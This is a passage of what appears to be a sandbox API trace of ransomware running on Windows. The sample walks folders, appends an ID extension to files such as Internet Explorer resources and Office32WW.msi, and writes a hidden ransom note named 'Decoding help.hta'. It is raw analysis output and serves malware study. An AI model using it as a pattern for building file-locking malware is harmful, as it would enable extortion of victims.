lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*" [0041.138] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*") returned 54 [0041.138] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\", lpString2="ielowutil.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\ielowutil.exe.mui") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\ielowutil.exe.mui" [0041.138] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\ielowutil.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\ielowutil.exe.mui") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\ielowutil.exe.mui" [0041.138] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\ielowutil.exe.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\ielowutil.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\ielowutil.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.138] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\ielowutil.exe.mui" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\ielowutil.exe.mui"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\ielowutil.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\ielowutil.exe.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.139] FindNextFileW (in: hFindFile=0x5a5870, lpFindFileData=0x4dcfd30 | out: lpFindFileData=0x4dcfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3537636, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xf3537636, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x81b77500, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x1400, dwReserved0=0x0, dwReserved1=0x0, cFileName="iexplore.exe.mui", cAlternateFileName="")) returned 1 [0041.139] lstrcpyW (in: lpString1=0x42b0868, lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*" [0041.139] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*") returned 54 [0041.139] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\Decoding help.hta" [0041.139] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\decoding help.hta")) returned 0x1 [0041.139] lstrcmpiW (lpString1="Decoding help.hta", lpString2="iexplore.exe.mui") returned -1 [0041.139] lstrlenW (lpString="iexplore.exe.mui") returned 16 [0041.139] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*" [0041.139] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*") returned 54 [0041.139] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\", lpString2="iexplore.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\iexplore.exe.mui") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\iexplore.exe.mui" [0041.139] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\iexplore.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\iexplore.exe.mui") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\iexplore.exe.mui" [0041.139] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\iexplore.exe.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\iexplore.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\iexplore.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.139] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\iexplore.exe.mui" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\iexplore.exe.mui"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\iexplore.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\iexplore.exe.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.139] FindNextFileW (in: hFindFile=0x5a5870, lpFindFileData=0x4dcfd30 | out: lpFindFileData=0x4dcfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128de43b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128de43b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="jsdbgui.dll.mui", cAlternateFileName="")) returned 1 [0041.139] lstrcpyW (in: lpString1=0x42b0868, lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*" [0041.139] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*") returned 54 [0041.140] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\Decoding help.hta" [0041.140] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\decoding help.hta")) returned 0x1 [0041.140] lstrcmpiW (lpString1="Decoding help.hta", lpString2="jsdbgui.dll.mui") returned -1 [0041.140] lstrlenW (lpString="jsdbgui.dll.mui") returned 15 [0041.140] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*" [0041.140] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*") returned 54 [0041.140] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\", lpString2="jsdbgui.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\jsdbgui.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\jsdbgui.dll.mui" [0041.140] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\jsdbgui.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\jsdbgui.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\jsdbgui.dll.mui" [0041.140] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\jsdbgui.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\jsdbgui.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\jsdbgui.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.140] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\jsdbgui.dll.mui" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\jsdbgui.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\jsdbgui.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\jsdbgui.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.140] FindNextFileW (in: hFindFile=0x5a5870, lpFindFileData=0x4dcfd30 | out: lpFindFileData=0x4dcfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128de43b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128de43b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0x0, dwReserved1=0x0, cFileName="jsdebuggeride.dll.mui", cAlternateFileName="")) returned 1 [0041.140] lstrcpyW (in: lpString1=0x42b0868, lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*" [0041.140] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*") returned 54 [0041.140] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\Decoding help.hta" [0041.140] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\decoding help.hta")) returned 0x1 [0041.140] lstrcmpiW (lpString1="Decoding help.hta", lpString2="jsdebuggeride.dll.mui") returned -1 [0041.141] lstrlenW (lpString="jsdebuggeride.dll.mui") returned 21 [0041.141] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*" [0041.141] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*") returned 54 [0041.141] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\", lpString2="jsdebuggeride.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\jsdebuggeride.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\jsdebuggeride.dll.mui" [0041.141] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\jsdebuggeride.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\jsdebuggeride.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\jsdebuggeride.dll.mui" [0041.141] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\jsdebuggeride.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\jsdebuggeride.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\jsdebuggeride.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.141] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\jsdebuggeride.dll.mui" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\jsdebuggeride.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\jsdebuggeride.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\jsdebuggeride.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.141] FindNextFileW (in: hFindFile=0x5a5870, lpFindFileData=0x4dcfd30 | out: lpFindFileData=0x4dcfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128de43b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128de43b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSProfilerCore.dll.mui", cAlternateFileName="")) returned 1 [0041.141] lstrcpyW (in: lpString1=0x42b0868, lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*" [0041.141] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*") returned 54 [0041.141] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\Decoding help.hta" [0041.141] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\decoding help.hta")) returned 0x1 [0041.141] lstrcmpiW (lpString1="Decoding help.hta", lpString2="JSProfilerCore.dll.mui") returned -1 [0041.141] lstrlenW (lpString="JSProfilerCore.dll.mui") returned 22 [0041.141] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*" [0041.141] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*") returned 54 [0041.141] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\", lpString2="JSProfilerCore.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\JSProfilerCore.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\JSProfilerCore.dll.mui" [0041.141] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\JSProfilerCore.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\JSProfilerCore.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\JSProfilerCore.dll.mui" [0041.141] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\JSProfilerCore.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\JSProfilerCore.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\JSProfilerCore.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.142] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\JSProfilerCore.dll.mui" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\jsprofilercore.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\JSProfilerCore.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\jsprofilercore.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.142] FindNextFileW (in: hFindFile=0x5a5870, lpFindFileData=0x4dcfd30 | out: lpFindFileData=0x4dcfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128de43b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128de43b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="jsprofilerui.dll.mui", cAlternateFileName="")) returned 1 [0041.142] lstrcpyW (in: lpString1=0x42b0868, lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*" [0041.142] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*") returned 54 [0041.142] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\Decoding help.hta" [0041.142] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\decoding help.hta")) returned 0x1 [0041.142] lstrcmpiW (lpString1="Decoding help.hta", lpString2="jsprofilerui.dll.mui") returned -1 [0041.142] lstrlenW (lpString="jsprofilerui.dll.mui") returned 20 [0041.142] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*" [0041.142] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*") returned 54 [0041.142] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\", lpString2="jsprofilerui.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\jsprofilerui.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\jsprofilerui.dll.mui" [0041.142] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\jsprofilerui.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\jsprofilerui.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\jsprofilerui.dll.mui" [0041.142] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\jsprofilerui.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\jsprofilerui.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\jsprofilerui.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.142] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\jsprofilerui.dll.mui" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\jsprofilerui.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\jsprofilerui.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\jsprofilerui.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.142] FindNextFileW (in: hFindFile=0x5a5870, lpFindFileData=0x4dcfd30 | out: lpFindFileData=0x4dcfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128de43b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128de43b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="jsprofilerui.dll.mui", cAlternateFileName="")) returned 0 [0041.143] FindClose (in: hFindFile=0x5a5870 | out: hFindFile=0x5a5870) returned 1 Thread: id = 146 os_tid = 0x724 [0040.227] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\*.*", lpFindFileData=0x4f0fd30 | out: lpFindFileData=0x4f0fd30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5cd3a40, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa8c22f80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa8c22f80, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d81d0 [0040.888] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.888] FindNextFileW (in: hFindFile=0x5d81d0, lpFindFileData=0x4f0fd30 | out: lpFindFileData=0x4f0fd30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5cd3a40, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa8c22f80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa8c22f80, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.907] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.907] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.907] FindNextFileW (in: hFindFile=0x5d81d0, lpFindFileData=0x4f0fd30 | out: lpFindFileData=0x4f0fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x87078450, ftCreationTime.dwHighDateTime=0x1cb147f, ftLastAccessTime.dwLowDateTime=0x87078450, ftLastAccessTime.dwHighDateTime=0x1cb147f, ftLastWriteTime.dwLowDateTime=0xa5d1e590, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x1e6600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office32WW.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0041.378] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\*.*" [0041.378] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\*.*") returned 70 [0041.378] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Decoding help.hta") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Decoding help.hta" [0041.378] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\decoding help.hta")) returned 0xffffffff [0041.378] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0041.379] WriteFile (in: hFile=0x374, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x4f0fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x4f0fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0041.380] CloseHandle (hObject=0x374) returned 1 [0041.380] SetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.380] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Office32WW.msi") returned -1 [0041.380] lstrlenW (lpString="Office32WW.msi") returned 14 [0041.380] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\*.*" [0041.380] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\*.*") returned 70 [0041.381] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\", lpString2="Office32WW.msi" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi" [0041.381] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi" [0041.381] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi.[ID]g9uZrLhJaygpwRm1[ID]" [0041.381] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all 